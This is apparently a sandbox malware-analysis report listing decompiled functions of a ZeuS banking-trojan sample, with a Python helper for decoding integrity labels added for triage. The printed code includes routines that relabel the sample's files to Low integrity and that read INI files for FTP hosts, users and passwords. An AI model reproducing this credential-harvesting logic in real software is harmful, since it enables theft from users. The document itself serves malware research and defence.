  • Instruction ID: d858c4e74f3f53b2e73707feb907b40dd9e69712d5719015d1b31e5b6215471d
  • Opcode Fuzzy Hash: 2b9c93a098483c532e3eb310db293f4abdf10b192bc54bd7db778e8cb5f2484a
  • Instruction Fuzzy Hash: 0B115EB694020CFEEB019F948C80EEFBB7CEB15388F104076F901B21A1D2759E458B75
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00417C9B(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				void* __esi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x423460 == 0) {
					E0041CC9C(__ecx, 0x423460, 0x423668, 2);
					 *((short*)(E00405222(0x423668, 0x423460, E00405D35(0x423460) + _t10) + 0x423668)) = 0;
					_t3 = PathRemoveFileSpecW(0x423668);
				}
				if(_t13 != 0) {
					E00405587(_t3 | 0xffffffff, 0x423460, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x423c1c > 1) {
					E0040A7F9(0x423668);
					E00408867(0x423668);
					_t3 = GetFileAttributesW(0x423460);
					if(_t3 != 0xffffffff) {
						return E00408867(0x423460);
					}
				}
				return _t3;
			}

APIs
  • PathRemoveFileSpecW.SHLWAPI(00423668,00423668,00423460,00000000,00000002,00000000,00020000,00418795,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722), ref: 00417CD3
  • PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00418795,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,00000000,?), ref: 00417CEF
  • GetFileAttributesW.KERNEL32(00423460,00423668,00423668,00000000,00020000,00418795,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,00000000), ref: 00417D12
    • Part of subcall function 0041CC9C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423A10,00000032,77E49EB0,?,00000000), ref: 0041CD17
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
  • String ID: .tmp$`4B$h6B
  • API String ID: 3627892477-597483022
  • Opcode ID: d01f92a560e55bda1954e5a8868900820e2f08189a71fab542b0edfb9946eb78
  • Instruction ID: 6651383e98d92d9121988f7bbc1ca41a8fde8f18cbbeb77b5354ac410e1d928d
  • Opcode Fuzzy Hash: d01f92a560e55bda1954e5a8868900820e2f08189a71fab542b0edfb9946eb78
  • Instruction Fuzzy Hash: 7FF0623170415035E2213B36AC49ABF167A8F91729F54867FB111B22E1DF7C49838E9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 50%
			E00408867(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E004068B2(L"SeSecurityPrivilege");
				_t11 =  &_v12;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

APIs
    • Part of subcall function 004068B2: GetCurrentThread.KERNEL32 ref: 004068C2
    • Part of subcall function 004068B2: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068C9
    • Part of subcall function 004068B2: OpenProcessToken.ADVAPI32(000000FF,00000020,0040C177,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068DB
  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00408886
  • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 004088A2
  • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 004088B9
  • LocalFree.KERNEL32(00000000), ref: 004088C8
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
  • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
  • API String ID: 3555451682-1937014404
  • Opcode ID: 5cc411d04f1cd8e15bf7a529ab88b28542dc25dad19593ea62b464028fde4b5f
  • Instruction ID: 6123b2fb75b7a6f4906dbc7282b59584570ed6b19090230ffd0c374b448859c8
  • Opcode Fuzzy Hash: 5cc411d04f1cd8e15bf7a529ab88b28542dc25dad19593ea62b464028fde4b5f
  • Instruction Fuzzy Hash: 9A0181B660020CBFEF10AFA0CE85EEF7B7CEB04740F004076B541B11A1DB759A549A28
Uniqueness

Uniqueness Score: -1.00%
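Added example, not code from the report or from the sample: E00408867 builds a security descriptor from the SDDL string S:(ML;CIOI;NRNWNX;;;LW), pulls its SACL out with GetSecurityDescriptorSacl and writes it to the path in _a4 via SetNamedSecurityInfoW(path, SE_FILE_OBJECT = 1, LABEL_SECURITY_INFORMATION = 0x10, ...), after enabling SeSecurityPrivilege. That ACE is a mandatory integrity label of Low (S-1-16-4096) with NoReadUp, NoWriteUp and NoExecuteUp, inherited by child files and folders (CI, OI); E00417C9B calls this on both the sample's directory and its file. Since Windows treats an unlabeled object as Medium with NoWriteUp, relabeling to Low does not harden the file, it opens it to low-integrity processes such as a protected-mode browser tab. (The listing's `if(_t16 == 0)` after SetNamedSecurityInfoW re-tests the earlier GetSecurityDescriptorSacl result; at 50% quality that is almost certainly a decompilation artifact and the real code tests the SetNamedSecurityInfoW return for ERROR_SUCCESS.) The Python below parses the SACL section of an SDDL string and evaluates the integrity check for a given subject level; parse_ace, parse_sddl_sacl, access_permitted and the other names are this example's own, and it decodes ML ACEs only, not DACL entries.

```python
import re

# SDDL tokens for mandatory-label ACEs (values from winnt.h / sddl.h).
ACE_TYPES = {"ML": "SYSTEM_MANDATORY_LABEL_ACE_TYPE"}
ACE_FLAGS = {"OI": 0x01, "CI": 0x02, "NP": 0x04, "IO": 0x08, "ID": 0x10}
LABEL_POLICY = {  # SYSTEM_MANDATORY_LABEL_NO_*_UP bits in the ACE mask
    "NW": 0x1,    # subjects below the label may not write
    "NR": 0x2,    # ... may not read
    "NX": 0x4,    # ... may not execute
}
LABEL_ALIASES = {"LW": 0x1000, "ME": 0x2000, "MP": 0x2100, "HI": 0x3000, "SI": 0x4000}
OPERATION_BIT = {"write": 0x1, "read": 0x2, "execute": 0x4}


def _tokens(field, table):
    """Split a run of two-letter SDDL tokens ("CIOI" -> ["CI", "OI"]), validating each."""
    if len(field) % 2:
        raise ValueError(f"odd-length token run {field!r}")
    toks = [field[i:i + 2] for i in range(0, len(field), 2)]
    bad = [t for t in toks if t not in table]
    if bad:
        raise ValueError(f"unknown SDDL token(s) {bad}")
    return toks


def _label_rid(sid):
    """Accept the SDDL alias (LW, ME, ...) or a literal S-1-16-<rid> string."""
    if sid in LABEL_ALIASES:
        return LABEL_ALIASES[sid]
    if sid.startswith("S-1-16-"):
        return int(sid[len("S-1-16-"):])
    raise ValueError(f"not a mandatory-label SID: {sid!r}")


def parse_ace(text):
    """Decode one '(type;flags;rights;object_guid;inherit_object_guid;sid)' ACE."""
    fields = text.strip("()").split(";")
    if len(fields) != 6:
        raise ValueError(f"ACE needs six ';'-separated fields: {text!r}")
    ace_type, flags, rights, _obj_guid, _inh_guid, sid = fields
    if ace_type not in ACE_TYPES:
        raise ValueError("this example decodes mandatory-label (ML) ACEs only")
    rid = _label_rid(sid)
    return {
        "type": ACE_TYPES[ace_type],
        "flags": _tokens(flags, ACE_FLAGS),
        "policy": _tokens(rights, LABEL_POLICY),
        "label_rid": rid,
        "sid": f"S-1-16-{rid}",
    }


def parse_sddl_sacl(sddl):
    """Return the ACEs of the S: (SACL) section of an SDDL string."""
    m = re.search(r"S:(?:P|AI|AR)*((?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("no SACL section in SDDL string")
    return [parse_ace(a) for a in re.findall(r"\([^)]*\)", m.group(1))]


def policy_mask(ace):
    return sum(LABEL_POLICY[p] for p in ace["policy"])


def access_permitted(ace, subject_rid, operation):
    """Mandatory integrity check alone (the DACL is evaluated separately):
    a subject at or above the object's label is never blocked by the label;
    one below it is blocked for each operation whose NO_*_UP bit is set."""
    if subject_rid >= ace["label_rid"]:
        return True
    return not (policy_mask(ace) & OPERATION_BIT[operation])


# An object with no explicit label is treated by Windows as Medium with NoWriteUp.
DEFAULT_IMPLICIT_LABEL = parse_ace("(ML;;NW;;;ME)")


if __name__ == "__main__":
    sample_label = parse_sddl_sacl("S:(ML;CIOI;NRNWNX;;;LW)")[0]
    low_tab = LABEL_ALIASES["LW"]  # e.g. a protected-mode browser process
    for name, ace in (("implicit Medium", DEFAULT_IMPLICIT_LABEL), ("sample's Low", sample_label)):
        print(name, "label, write by a Low subject:", access_permitted(ace, low_tab, "write"))
```

Run against the sample's string, the Low label permits writes from a Low-integrity subject that the implicit Medium label would refuse; the NR/NW/NX bits only bite for Untrusted (RID 0) subjects. For triage, a file under a user profile carrying S-1-16-4096 with CI/OI inheritance is worth a second look for exactly this reason.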

C-Code - Quality: 77%
			E0040EAD1(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E0040E9F2(_t70, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E0040E862(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E0040E862(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E0040D6A0(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E0040E9F2(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

APIs
  • GetAncestor.USER32(?,00000002), ref: 0040EAFA
  • SendMessageTimeoutW.USER32 ref: 0040EB25
  • PostMessageW.USER32(?,00000020,?,00000000), ref: 0040EB67
  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040EBFD
  • PostMessageW.USER32(?,00000112,?,?), ref: 0040EC50
  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040EC8F
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
  • String ID:
  • API String ID: 1223205383-0
  • Opcode ID: c78ea9d9b23a228309be7845c3810fe23e7c57ff3c2467d3b32d347d8d4af1d2
  • Instruction ID: b2c266d80627c8065ebe80120cc70b6316188c4abb24ea71180ffee9d33726d8
  • Opcode Fuzzy Hash: c78ea9d9b23a228309be7845c3810fe23e7c57ff3c2467d3b32d347d8d4af1d2
  • Instruction Fuzzy Hash: 8451B171608205AAFF345A1ACC85BBE3665EB05340F240C37F942F62E1C27EDCE1A65A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
			E00414366(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				WCHAR* _t72;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t117;
				intOrPtr _t126;
				signed int _t127;
				void* _t129;

				_t129 = (_t127 & 0xfffffff8) - 0x284;
				if(E0040AA77( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t132 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t117 = E004051B6(0x1fffe);
					_v628 = _t117;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E004051E6(_t117);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E00406096(_t117, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t111 = E004051B6(0xc1c);
					_v640 = _t111;
					__eflags = _t111;
					if(_t111 != 0) {
						_t11 =  &(_t111[0x2fd]); // 0x5fa
						_v632 = _t11;
						_v644 = _t117;
						_t61 = 0x72;
						E0040F34A(_t61,  &_v584);
						_t63 = 0x73;
						E0040F34A(_t63,  &_v596);
						_t65 = 0x74;
						E0040F34A(_t65,  &_v608);
						_t67 = 0x75;
						E0040F34A(_t67,  &_v624);
						_t69 = 0x76;
						E0040F34A(_t69,  &_v616);
						goto L9;
						L18:
						_t74 = E004060D2(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t111 = _v644;
							L9:
							_t72 = StrStrIW(_v644,  &_v584);
							__eflags = _t72;
							if(_t72 == 0) {
								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 != 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t112 =  &(_t111[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 != 0) {
											_t33 =  &(_t112[0xff]); // 0x0
											_t124 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 != 0) {
												_t89 = E00405D35(_t124);
												__eflags = _t89;
												if(_t89 > 0) {
													_t125 =  &_v568;
													_t90 = 0x55;
													E0040F34A(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t112[0xff]); // 0x0
													_push(_v644);
													_push(_t112);
													_t113 = _v636;
													_t94 = E00405ED9(_t125, 0x311, _v636, _t125);
													_t129 = _t129 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t126 = _a4;
														_t95 = E004055DA(_t94, _t126, _t113);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t126 + 4;
															 *_t42 =  &(( *(_t126 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E004051E6(_v644);
						_t117 = _v636;
					}
					goto L20;
				} else {
					E0041432E(_t132,  &_v524, _a4);
					goto L21;
				}
			}

APIs
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
  • GetPrivateProfileStringW.KERNEL32 ref: 004143DB
  • StrStrIW.SHLWAPI(?,?), ref: 00414468
  • GetPrivateProfileStringW.KERNEL32 ref: 00414490
  • GetPrivateProfileIntW.KERNEL32 ref: 004144AD
  • GetPrivateProfileStringW.KERNEL32 ref: 004144DE
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: PrivateProfile$String$CombinePath
  • String ID:
  • API String ID: 2134968610-0
  • Opcode ID: bf0a9294d8a7f098b0cb978180706d68efbb4c96a3df6d8b9cb7a13658a704fd
  • Instruction ID: 983498ebd1e8d0212289d6975de336a777fdd2abd83d2f322fb40bc98a9e532e
  • Opcode Fuzzy Hash: bf0a9294d8a7f098b0cb978180706d68efbb4c96a3df6d8b9cb7a13658a704fd
  • Instruction Fuzzy Hash: 83518632504306ABD710DA559C01EEBB7E9EFC4714F00093EBA98E7191DB38E94587AA
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0041651A(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				struct _GOPHER_FIND_DATAA _t59;
				intOrPtr _t60;
				struct _GOPHER_FIND_DATAA _t61;
				struct _GOPHER_FIND_DATAA _t62;
				signed int _t71;
				struct _GOPHER_FIND_DATAA _t79;
				struct _GOPHER_FIND_DATAA _t84;
				int _t89;
				struct _GOPHER_FIND_DATAA _t91;
				void* _t96;
				intOrPtr* _t99;
				struct _GOPHER_FIND_DATAA _t103;
				struct _GOPHER_FIND_DATAA _t107;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x423420);
				_t99 = _a4;
				_t55 = E00415D7F( *_t99);
				if(_t55 == 0xffffffff) {
					L33:
					LeaveCriticalSection(0x423420);
					return _v16;
				}
				_t58 = _t55 * 0x24 +  *0x423438;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L33;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					__eflags = _t59;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
						__eflags =  *_t59;
					}
					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						__eflags = _t60 - 0xffffffff;
						if(_t60 != 0xffffffff) {
							__eflags = _v16 - 0xffffffff;
							if(_v16 == 0xffffffff) {
								_t61 = _t60 -  *(_t96 + 0x1c);
								__eflags = _t61;
								_t103 = _t61;
								if(_t61 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E0040656B(0x2000, 0x1000);
									}
									__eflags = _a12 - _t103;
									_t103 =  <  ? _a12 : _t103;
									__eflags = _a8;
									if(_a8 != 0) {
										E00405222(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
										_t50 = _t96 + 0x1c;
										 *_t50 =  *(_t96 + 0x1c) + _t103;
										__eflags =  *_t50;
									}
								}
								_t62 = _a16;
								__eflags = _t62;
								if(_t62 != 0) {
									 *_t62 = _t103;
								}
								_v16 = 1;
							}
						}
						goto L32;
					}
					LeaveCriticalSection(0x423420);
					_v5 = E00416401( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x423420);
					__eflags = _v5;
					if(_v5 == 0) {
						L21:
						_t37 =  &_v16;
						 *_t37 = _v16 & 0x00000000;
						__eflags =  *_t37;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t105 =  *_a4;
					_t71 = E00415D7F( *_a4);
					__eflags = _t71 - 0xffffffff;
					if(_t71 == 0xffffffff) {
						E004051E6(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x423438;
					_t101 = E0040731C( &_v24, _t105);
					_t79 = E00412174( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
					__eflags = _t79;
					if(_t79 == 0) {
						L19:
						E004051E6(_t101);
						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
						goto L22;
					}
					_t84 = E00405426(_v24, 0, _t101);
					_a4 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L19;
					}
					_v28 = 0x1000;
					_t107 = E004051B6(0x1000);
					__eflags = _t107;
					if(_t107 == 0) {
						L18:
						E004051E6(_a4);
						goto L19;
					}
					 *_t107 = 0x50;
					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
					__eflags = _t89;
					if(_t89 != 0) {
						_t91 =  *(_t107 + 8);
						__eflags = _t91;
						if(_t91 != 0) {
							__eflags =  *_t91;
							if( *_t91 != 0) {
								E0040A39D(_t91, _v12, _v20);
							}
						}
					}
					E004051E6(_t107);
					goto L18;
				} else {
					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
					L32:
					goto L33;
				}
			}

APIs
  • EnterCriticalSection.KERNEL32(00423420), ref: 0041652B
  • LeaveCriticalSection.KERNEL32(00423420), ref: 0041658E
  • EnterCriticalSection.KERNEL32(00423420), ref: 004165AB
  • GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041662F
  • SetLastError.KERNEL32(00002EE4), ref: 00416685
  • LeaveCriticalSection.KERNEL32(00423420), ref: 004166EE
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
  • String ID:
  • API String ID: 3653105453-0
  • Opcode ID: 6bfefdb4f30c7ef8e8486ee681594fcb7aa45fe6dd1c788c387d096db1c24bcd
  • Instruction ID: 44f88c0864a88631713b66dc6c905baa4380e68839e8ec37f8a1657d21b09a30
  • Opcode Fuzzy Hash: 6bfefdb4f30c7ef8e8486ee681594fcb7aa45fe6dd1c788c387d096db1c24bcd
  • Instruction Fuzzy Hash: 4C516E31A00215ABCF11DF65D885BDF7BB4EF04354F0642AAF811AB2A5D738DA91CF98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
			E00413F6F(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t83;
				WCHAR* _t84;
				WCHAR* _t86;
				intOrPtr _t96;
				void* _t97;

				_t81 = __edx;
				_t40 = E004051B6(0x1fffe);
				_t86 = _t40;
				_v20 = _t86;
				if(_t86 == 0) {
					return _t40;
				}
				// NULL lpAppName and lpKeyName: returns every section name of the INI file _a4 as a
				// NUL-separated list into the 0xffff-WCHAR buffer allocated above (0x1fffe bytes)
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E004051E6(_t86);
				}
				_t3 = _t41 + 1; // 0x1
				if(E00406096(_t86, _t3) == 0) {
					goto L17;
				}
				_t83 = E004051B6(0xc08);
				_v12 = _t83;
				if(_t83 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t83[0x2fd]); // 0x5fa
					_v16 = _t5;
					_v8 = _t86;
					_t48 = 0x65;
					E0040F34A(_t48,  &_v112);
					_t50 = 0x66;
					E0040F34A(_t50,  &_v48);
					_t52 = 0x67;
					E0040F34A(_t52,  &_v32);
					_t54 = 0x68;
